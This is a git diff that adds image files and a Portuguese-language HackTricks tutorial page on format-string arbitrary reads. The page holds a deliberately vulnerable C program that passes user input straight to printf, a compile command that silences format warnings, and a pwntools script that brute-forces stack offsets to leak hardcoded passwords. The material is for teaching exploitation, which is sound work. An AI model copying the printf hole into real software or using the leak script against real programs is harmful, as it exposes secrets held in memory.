diff --git a/.gitbook/assets/image (1225).png b/.gitbook/assets/image (1225).png
new file mode 100644
index 000000000..b0a1f83a4
Binary files /dev/null and b/.gitbook/assets/image (1225).png differ
diff --git a/.gitbook/assets/image (1226).png b/.gitbook/assets/image (1226).png
new file mode 100644
index 000000000..66c23406f
Binary files /dev/null and b/.gitbook/assets/image (1226).png differ
diff --git a/.gitbook/assets/image (1227).png b/.gitbook/assets/image (1227).png
new file mode 100644
index 000000000..47298f9e6
Binary files /dev/null and b/.gitbook/assets/image (1227).png differ
diff --git a/.gitbook/assets/image (1228).png b/.gitbook/assets/image (1228).png
new file mode 100644
index 000000000..2cb50f892
Binary files /dev/null and b/.gitbook/assets/image (1228).png differ
diff --git a/.gitbook/assets/image (1229).png b/.gitbook/assets/image (1229).png
new file mode 100644
index 000000000..ffbd0b31e
Binary files /dev/null and b/.gitbook/assets/image (1229).png differ
diff --git a/.gitbook/assets/image (1230).png b/.gitbook/assets/image (1230).png
new file mode 100644
index 000000000..49c6c459e
Binary files /dev/null and b/.gitbook/assets/image (1230).png differ
diff --git a/.gitbook/assets/image (1231).png b/.gitbook/assets/image (1231).png
new file mode 100644
index 000000000..545fcdfaf
Binary files /dev/null and b/.gitbook/assets/image (1231).png differ
diff --git a/.gitbook/assets/image (1232).png b/.gitbook/assets/image (1232).png
new file mode 100644
index 000000000..a3ec7d605
Binary files /dev/null and b/.gitbook/assets/image (1232).png differ
diff --git a/.gitbook/assets/image (1233).png b/.gitbook/assets/image (1233).png
new file mode 100644
index 000000000..4d9c81fde
Binary files /dev/null and b/.gitbook/assets/image (1233).png differ
diff --git a/.gitbook/assets/image (1234).png b/.gitbook/assets/image (1234).png
new file mode 100644
index 000000000..21b3b1ba6
Binary files /dev/null and b/.gitbook/assets/image (1234).png differ
diff --git a/SUMMARY.md b/SUMMARY.md
index 7edb398d4..1cc896174 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -715,6 +715,7 @@
* [Array Indexing](binary-exploitation/array-indexing.md)
* [Integer Overflow](binary-exploitation/integer-overflow.md)
* [Format Strings](binary-exploitation/format-strings/README.md)
+ * [Format Strings - Arbitrary Read Example](binary-exploitation/format-strings/format-strings-arbitrary-read-example.md)
* [Format Strings Template](binary-exploitation/format-strings/format-strings-template.md)
* [Heap](binary-exploitation/heap/README.md)
* [Use After Free](binary-exploitation/heap/use-after-free.md)
diff --git a/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
new file mode 100644
index 000000000..df3fb5d9d
--- /dev/null
+++ b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
@@ -0,0 +1,98 @@
+# Exemplo de Leitura Arbitrária - Strings de Formato
+
+
+
+Aprenda hacking AWS do zero ao herói comhtARTE (HackTricks AWS Red Team Expert)!
+
+Outras maneiras de apoiar o HackTricks:
+
+* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
+* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
+* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
+
+
+
+## Código
+```c
+#include
+#include
+
+char bss_password[20] = "hardcodedPassBSS"; // Password in BSS
+
+int main() {
+char stack_password[20] = "secretStackPass"; // Password in stack
+char input1[20], input2[20];
+
+printf("Enter first password: ");
+scanf("%19s", input1);
+
+printf("Enter second password: ");
+scanf("%19s", input2);
+
+// Vulnerable printf
+printf(input1);
+printf("\n");
+
+// Check both passwords
+if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) {
+printf("Access Granted.\n");
+} else {
+printf("Access Denied.\n");
+}
+
+return 0;
+}
+```
+Compile com:
+```bash
+clang -o fs-read fs-read.c -Wno-format-security
+```
+### Ler da pilha
+
+A **`stack_password`** será armazenada na pilha porque é uma variável local, então apenas abusar do printf para mostrar o conteúdo da pilha é suficiente. Este é um exploit para BF as primeiras 100 posições para vazar as senhas da pilha:
+```python
+from pwn import *
+
+for i in range(100):
+print(f"Try: {i}")
+payload = f"%{i}$s\na".encode()
+p = process("./fs-read")
+p.sendline(payload)
+output = p.clean()
+print(output)
+p.close()
+```
+Na imagem é possível ver que podemos vazar a senha da pilha na posição `10ª`:
+
+
+
+
+
+Executando o mesmo exploit, mas com `%p` em vez de `%s`, é possível vazar um endereço de heap da pilha em `%5$p`:
+
+
+
+
+
+
+
+A diferença entre o endereço vazado e o endereço da senha é:
+```
+> print 0xaaaaaaac12b2 - 0xaaaaaaac0048
+$1 = 0x126a
+```
+
+
+Aprenda hacking AWS do zero ao herói comhtARTE (HackTricks AWS Red Team Expert)!
+
+Outras maneiras de apoiar o HackTricks:
+
+* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
+* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
+* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
+
+
.png)
.png)
.png)
.png)
.png)